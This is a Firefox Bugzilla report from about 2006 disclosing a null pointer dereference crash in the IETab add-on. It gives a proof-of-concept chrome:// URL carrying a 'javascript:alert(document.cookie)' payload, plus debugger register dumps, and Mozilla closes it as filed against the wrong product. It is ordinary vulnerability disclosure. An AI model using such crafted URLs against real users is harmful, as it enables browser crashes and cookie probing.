Firefox (with IETab Plugin) Null Pointer Dereferences Bug

RESOLVED INVALID

Status

()

defect
RESOLVED INVALID
13 years ago
11 years ago

People

(Reporter: d3basis.m0hanty, Unassigned)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

()

Reporter

Description

13 years ago
User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Build Identifier: 

Product: FireFox with IE Tab 

Tested On: 
FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)

Introduction: 
IETab (https://addons.mozilla.org/firefox/1419/) is a recently released (April 12, 2006) plugin for Firefox. It is used to browse IE (only) specific sites under Firefox. Guess what ?? You can run windowsupdate under FireFox ;-)

Bug Details: 	
Firefox with the IETab installed crashes when ietab plugin is unable to handle specific javascripts. It seems to be a null pointer dereference bug. For more details refer the PoC section. 

Proof-of-Concept:
Copy & paste the following URL to the Firefox addressbar and press enter - 

chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie);

Note: This test will not work if IETab is not installed.

The Registers details after the crash: 

(1e4.3e0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246

npietab!NP_GetEntryPoints+0xb8ac:

0192e7dc 668b10           mov     dx,[eax]              ds:0023:00000000=????
0:000> g
(1e4.3e0): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10           mov     dx,[eax]              ds:0023:00000000=????

For more vulnerabilities : http://hackingspirits.com/vuln-rnd/vuln-rnd.html

Credits:
Debasis Mohanty (aka Tr0y)
www.hackingspirits.com

Reproducible: Always

Steps to Reproduce:
1. Copy & paste the following URL to the Firefox addressbar and press enter - 
chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie);

Note: This test will not work if IETab is not installed.
Actual Results:  
The Registers details after the crash: 

(1e4.3e0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246

npietab!NP_GetEntryPoints+0xb8ac:

0192e7dc 668b10           mov     dx,[eax]              ds:0023:00000000=????
0:000> g
(1e4.3e0): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10           mov     dx,[eax]              ds:0023:00000000=????
This is a bug in IETab so I've filed it in their bug database over on mozdev.org:
http://bugzilla.mozdev.org/show_bug.cgi?id=14151

Clearing confidential flag because full details are available in public at http://hackingspirits.com/vuln-rnd/ffietab_die.txt

(Note: the "invalid" resolution is not a comment on the problem itself, just that it's filed against the wrong product. I wish we had a better choice of resolutions.)
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → INVALID
Product: Firefox → Toolkit
You need to log in before you can comment on or make changes to this bug.